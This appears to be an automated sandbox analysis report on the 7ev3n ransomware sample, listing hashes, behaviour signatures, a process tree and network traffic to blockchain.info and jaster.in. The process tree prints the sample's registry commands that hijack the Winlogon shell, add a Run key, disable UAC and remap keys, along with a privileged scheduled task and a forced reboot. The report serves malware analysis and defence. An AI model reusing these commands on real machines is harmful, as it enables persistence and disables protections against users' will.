Analysis

  • max time kernel
    72s
  • max time network
    106s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-uk
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-uklocale:uk-uaos:windows10-2004-x64systemwindows
  • submitted
    03-03-2024 13:53

Errors

Reason
Machine shutdown

General

  • Target

    Ransomware/7ev3n.exe

  • Size

    315KB

  • MD5

    9f8bc96c96d43ecb69f883388d228754

  • SHA1

    61ed25a706afa2f6684bb4d64f69c5fb29d20953

  • SHA256

    7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5

  • SHA512

    550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

  • SSDEEP

    6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ransomware\7ev3n.exe
    "C:\Users\Admin\AppData\Local\Temp\Ransomware\7ev3n.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4192
    • C:\Users\Admin\AppData\Local\system.exe
      "C:\Users\Admin\AppData\Local\system.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2996
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
        3⤵
          PID:4516
        • C:\Windows\SysWOW64\SCHTASKS.exe
          C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:2212
        • C:\windows\SysWOW64\cmd.exe
          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3288
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
            4⤵
            • Modifies WinLogon for persistence
            PID:880
        • C:\windows\SysWOW64\cmd.exe
          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3308
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
            4⤵
            • Adds Run key to start application
            PID:1412
        • C:\windows\SysWOW64\cmd.exe
          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1148
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
            4⤵
              PID:1748
          • C:\windows\SysWOW64\cmd.exe
            C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1868
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
              4⤵
                PID:2244
            • C:\windows\SysWOW64\cmd.exe
              C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:796
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                4⤵
                  PID:2020
              • C:\windows\SysWOW64\cmd.exe
                C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3668
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                  4⤵
                  • UAC bypass
                  PID:3376
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1928
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                  4⤵
                    PID:1492
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4188
                  • C:\Windows\SysWOW64\shutdown.exe
                    shutdown -r -t 10 -f
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1020
            • C:\Windows\system32\LogonUI.exe
              "LogonUI.exe" /flags:0x4 /state0:0xa3940855 /state1:0x41c64e6d
              1⤵
              • Modifies data under HKEY_USERS
              • Suspicious use of SetWindowsHookEx
              PID:1636

            Network

            • flag-us
              DNS
              81.171.91.138.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              81.171.91.138.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              134.32.126.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              134.32.126.40.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              0.205.248.87.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              0.205.248.87.in-addr.arpa
              IN PTR
              Response
              0.205.248.87.in-addr.arpa
              IN PTR
              https-87-248-205-0lgwllnwnet
            • flag-us
              DNS
              183.59.114.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              183.59.114.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              blockchain.info
              7ev3n.exe
              Remote address:
              8.8.8.8:53
              Request
              blockchain.info
              IN A
              Response
              blockchain.info
              IN A
              104.17.139.37
              blockchain.info
              IN A
              104.17.141.37
              blockchain.info
              IN A
              104.17.138.37
              blockchain.info
              IN A
              104.17.137.37
              blockchain.info
              IN A
              104.17.140.37
            • flag-us
              GET
              https://blockchain.info/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e
              7ev3n.exe
              Remote address:
              104.17.139.37:443
              Request
              GET /api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e HTTP/1.1
              User-Agent: Internet Explorer
              Host: blockchain.info
              Response
              HTTP/1.1 301 Moved Permanently
              Date: Sun, 03 Mar 2024 13:56:17 GMT
              Content-Type: text/html
              Content-Length: 162
              Connection: keep-alive
              Location: https://www.blockchain.com/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              X-Blockchain-Cp-F: zzwb 0.000 998ec0fb9ba801d66eb3744c84f53414
              X-Blockchain-Language: en
              X-Blockchain-Language-Id: 0:0:0 (en:en:en)
              X-Blockchain-Server: BlockchainFE/1.0
              X-Content-Type-Options: nosniff
              X-Original-Host: blockchain.info
              X-Request-Id: 998ec0fb9ba801d66eb3744c84f53414
              X-Xss-Protection: 1; mode=block
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 85ea21091d02dd33-LHR
            • flag-us
              GET
              https://blockchain.info/q/getreceivedbyaddress/tle><meta%20name=
              7ev3n.exe
              Remote address:
              104.17.139.37:443
              Request
              GET /q/getreceivedbyaddress/tle><meta%20name= HTTP/1.1
              User-Agent: Internet Explorer
              Host: blockchain.info
              Response
              HTTP/1.1 404 Not Found
              Date: Sun, 03 Mar 2024 13:56:18 GMT
              Content-Type: application/json; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Access-Control-Allow-Origin: *
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              Vary: Accept-Encoding
              X-Blockchain-Cp-B: haskoin-store-btc
              X-Blockchain-Cp-F: zzwb 0.005 - 91815a10745943b71ce5eb8173efff9d
              X-Blockchain-Language: en
              X-Blockchain-Language-Id: 0:0:0 (en:en:en)
              X-Blockchain-Server: BlockchainFE/1.0
              X-Content-Type-Options: nosniff
              X-Original-Host: blockchain.info
              X-Request-Id: 91815a10745943b71ce5eb8173efff9d
              X-Xss-Protection: 1; mode=block
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 85ea210c6920dd33-LHR
            • flag-us
              DNS
              www.blockchain.com
              7ev3n.exe
              Remote address:
              8.8.8.8:53
              Request
              www.blockchain.com
              IN A
              Response
              www.blockchain.com
              IN A
              104.16.29.98
              www.blockchain.com
              IN A
              104.16.30.98
            • flag-us
              GET
              https://www.blockchain.com/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e
              7ev3n.exe
              Remote address:
              104.16.29.98:443
              Request
              GET /api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e HTTP/1.1
              User-Agent: Internet Explorer
              Host: www.blockchain.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 302 Found
              Date: Sun, 03 Mar 2024 13:56:17 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: keep-alive
              Location: https://www.blockchain.com/explorer/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              X-Blockchain-Cp-F: zzwb 0.000 c28896fab281034926ed9db81a9b6d4b
              X-Blockchain-Language: en
              X-Blockchain-Language-Id: 0:0:0 (en:en:en)
              X-Blockchain-Server: BlockchainFE/1.0
              X-Content-Type-Options: nosniff
              X-Original-Host: www.blockchain.com
              X-Request-Id: c28896fab281034926ed9db81a9b6d4b
              X-Xss-Protection: 1; mode=block
              CF-Cache-Status: MISS
              Server: cloudflare
              CF-RAY: 85ea210a1f81dd0f-LHR
            • flag-us
              GET
              https://www.blockchain.com/explorer/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e
              7ev3n.exe
              Remote address:
              104.16.29.98:443
              Request
              GET /explorer/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e HTTP/1.1
              User-Agent: Internet Explorer
              Host: www.blockchain.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 302 Found
              Date: Sun, 03 Mar 2024 13:56:17 GMT
              Transfer-Encoding: chunked
              Connection: keep-alive
              Location: /explorer/api
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              X-Blockchain-Cp-B: explorer-react-frontend
              X-Blockchain-Cp-F: zzwb 0.002 - 792844396894e9372263e8937ee0da3d
              X-Blockchain-Language: en
              X-Blockchain-Language-Id: 0:0:0 (en:en:en)
              X-Blockchain-Server: BlockchainFE/1.0
              X-Content-Type-Options: nosniff
              X-Original-Host: www.blockchain.com
              X-Request-Id: 792844396894e9372263e8937ee0da3d
              X-Xss-Protection: 1; mode=block
              CF-Cache-Status: MISS
              Server: cloudflare
              CF-RAY: 85ea210a7fe9dd0f-LHR
            • flag-us
              GET
              https://www.blockchain.com/explorer/api
              7ev3n.exe
              Remote address:
              104.16.29.98:443
              Request
              GET /explorer/api HTTP/1.1
              User-Agent: Internet Explorer
              Host: www.blockchain.com
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Sun, 03 Mar 2024 13:56:17 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Cache-Control: public, max-age=30, stale-while-revalidate=60, must-revalidate
              Content-Language: en
              Content-Security-Policy: default-src 'self'; media-src 'self' https://anchor.fm https://*.cloudfront.net *.adform.net *.bannerflow.net; connect-src wss: https:; object-src 'none'; frame-src https://request-global.czilladx.com/ https://*.safeframe.googlesyndication.com/ *.googlesyndication.com; frame-ancestors 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://*.blockchain.com *.google-analytics.com https://coinzillatag.com/lib/display.js *.czilladx.com googleads.g.doubleclick.net https://cdn4.buysellads.net www.googletagservices.com *.googletagmanager.com c.amazon-adsystem.com securepubads.g.doubleclick.net c.amazon-adsystem.com adservice.google.com adservice.google.be tpc.googlesyndication.com btloader.com https://d3div1mtym39ic.cloudfront.net/aax2/apstag.js blob: *.cloudflare.com *.createjs.com *.cleverwebserver.com banner.org.ua *.addform.net *.bannerflow.net *.2mdn.net; form-action 'self'; style-src 'self' 'unsafe-inline' https://rsms.me fonts.googleapis.com *.adform.net *.2mdn.net; font-src 'self' https://rsms.me *.googleapis.com *.gstatic.com *.bannerflow.net *.adform.net; img-src 'self' https: data:; script-src-elem 'self' 'unsafe-inline' 'unsafe-eval' blob: *.cloudflare.com *.createjs.com *.cleverwebserver.com https://coinzillatag.com/lib/display.js *.czilladx.com banner.org.ua *.addform.net *.bannerflow.net *.2mdn.net https://*.blockchain.com *.google-analytics.com googleads.g.doubleclick.net https://cdn4.buysellads.net www.googletagservices.com *.googletagmanager.com c.amazon-adsystem.com securepubads.g.doubleclick.net c.amazon-adsystem.com adservice.google.com adservice.google.be tpc.googlesyndication.com btloader.com https://d3div1mtym39ic.cloudfront.net/aax2/apstag.js; child-src 'self' *.coinzilla.com *.coinzilla.io *.clevernt.com *.cleverwebserver.com feedapi.live hash.game bc.co bc.fun bcga.me bc.app bc.game;
              Referrer-Policy: strict-origin-when-cross-origin
              Set-Cookie: clang=en; Path=/
              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              X-Blockchain-Cp-B: explorer-react-frontend
              X-Blockchain-Cp-F: zzwb 0.162 - d3807f6c58940156d4ac1d543995c64d
              X-Blockchain-Language: en
              X-Blockchain-Language-Id: 0:0:0 (en:en:en)
              X-Blockchain-Server: BlockchainFE/1.0
              X-Content-Type-Options: nosniff
              X-Frame-Options: DENY
              X-Middleware-Cache: STALE
              X-Original-Host: www.blockchain.com
              X-Powered-By: Next.js
              X-Request-Id: d3807f6c58940156d4ac1d543995c64d
              X-Xss-Protection: 1; mode=block
              CF-Cache-Status: MISS
              Server: cloudflare
              CF-RAY: 85ea210ad83edd0f-LHR
            • flag-us
              DNS
              43.58.199.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              43.58.199.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              56.126.166.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              56.126.166.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              37.139.17.104.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              37.139.17.104.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              98.29.16.104.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              98.29.16.104.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              jaster.in
              system.exe
              Remote address:
              8.8.8.8:53
              Request
              jaster.in
              IN A
              Response
            • flag-us
              DNS
              140.71.91.104.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              140.71.91.104.in-addr.arpa
              IN PTR
              Response
              140.71.91.104.in-addr.arpa
              IN PTR
              a104-91-71-140deploystaticakamaitechnologiescom
            • flag-us
              DNS
              178.223.142.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              178.223.142.52.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              jaster.in
              system.exe
              Remote address:
              8.8.8.8:53
              Request
              jaster.in
              IN A
              Response
            • flag-us
              DNS
              59.189.79.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              59.189.79.40.in-addr.arpa
              IN PTR
              Response
            • 52.142.223.178:80
              52 B
              1
            • 104.17.139.37:443
              https://blockchain.info/q/getreceivedbyaddress/tle><meta%20name=
              tls, http
              7ev3n.exe
              1.2kB
              6.5kB
              14
              9

              HTTP Request

              GET https://blockchain.info/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e

              HTTP Response

              301

              HTTP Request

              GET https://blockchain.info/q/getreceivedbyaddress/tle><meta%20name=

              HTTP Response

              404
            • 104.16.29.98:443
              https://www.blockchain.com/explorer/api
              tls, http
              7ev3n.exe
              7.1kB
              153.2kB
              136
              131

              HTTP Request

              GET https://www.blockchain.com/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e

              HTTP Response

              302

              HTTP Request

              GET https://www.blockchain.com/explorer/api/receive?method=create&address=18sHYU49vUFk6TN6G2Pj6DSCUzkbLvwJt&callback=http://c.e

              HTTP Response

              302

              HTTP Request

              GET https://www.blockchain.com/explorer/api

              HTTP Response

              200
            • 8.8.8.8:53
              81.171.91.138.in-addr.arpa
              dns
              72 B
              146 B
              1
              1

              DNS Request

              81.171.91.138.in-addr.arpa

            • 8.8.8.8:53
              134.32.126.40.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              134.32.126.40.in-addr.arpa

            • 8.8.8.8:53
              0.205.248.87.in-addr.arpa
              dns
              71 B
              116 B
              1
              1

              DNS Request

              0.205.248.87.in-addr.arpa

            • 8.8.8.8:53
              183.59.114.20.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              183.59.114.20.in-addr.arpa

            • 8.8.8.8:53
              blockchain.info
              dns
              7ev3n.exe
              61 B
              141 B
              1
              1

              DNS Request

              blockchain.info

              DNS Response

              104.17.139.37
              104.17.141.37
              104.17.138.37
              104.17.137.37
              104.17.140.37

            • 8.8.8.8:53
              www.blockchain.com
              dns
              7ev3n.exe
              64 B
              96 B
              1
              1

              DNS Request

              www.blockchain.com

              DNS Response

              104.16.29.98
              104.16.30.98

            • 8.8.8.8:53
              43.58.199.20.in-addr.arpa
              dns
              71 B
              157 B
              1
              1

              DNS Request

              43.58.199.20.in-addr.arpa

            • 8.8.8.8:53
              56.126.166.20.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              56.126.166.20.in-addr.arpa

            • 8.8.8.8:53
              37.139.17.104.in-addr.arpa
              dns
              72 B
              134 B
              1
              1

              DNS Request

              37.139.17.104.in-addr.arpa

            • 8.8.8.8:53
              98.29.16.104.in-addr.arpa
              dns
              71 B
              133 B
              1
              1

              DNS Request

              98.29.16.104.in-addr.arpa

            • 8.8.8.8:53
              jaster.in
              dns
              system.exe
              55 B
              108 B
              1
              1

              DNS Request

              jaster.in

            • 8.8.8.8:53
              140.71.91.104.in-addr.arpa
              dns
              72 B
              137 B
              1
              1

              DNS Request

              140.71.91.104.in-addr.arpa

            • 8.8.8.8:53
              178.223.142.52.in-addr.arpa
              dns
              73 B
              147 B
              1
              1

              DNS Request

              178.223.142.52.in-addr.arpa

            • 8.8.8.8:53
              jaster.in
              dns
              system.exe
              55 B
              108 B
              1
              1

              DNS Request

              jaster.in

            • 8.8.8.8:53
              59.189.79.40.in-addr.arpa
              dns
              71 B
              145 B
              1
              1

              DNS Request

              59.189.79.40.in-addr.arpa

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\del.bat

              Filesize

              76B

              MD5

              2623d4a3f9735b4a8298ad5050eb73ef

              SHA1

              3dcd1491a378acd63f725bd427ecb9810dc3cea2

              SHA256

              01ddb9a534a1519c377c6951557207284a9a941870951797b2dfa5ed86a85709

              SHA512

              aff6ca24a072b2219dafaa751a011cf41b5e8f638438e79d4e1852ff33ce7dbfa87e9e36b867866b2b8bd5ae30f0267d0ce2827caea21ec73a690ae9b4e329e8

            • C:\Users\Admin\AppData\Local\system.exe

              Filesize

              315KB

              MD5

              68c8e18a1887eedc3da23719a34f6329

              SHA1

              682a53bb3b8006219f0cfde25f7866db755c0a19

              SHA256

              b3d38fd9bc60f5610c262392e8dcce0ad05b6a7ebc4e4b7232578ed80ff0270d

              SHA512

              2733065fe4e2ee1749bfb78d5541cdb5204f291ceec4711da856e4e8f2d80eed51169c5434afbcc493434862787267f878de619847f03113c078a24d8f177c07

            We care about your privacy.

            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.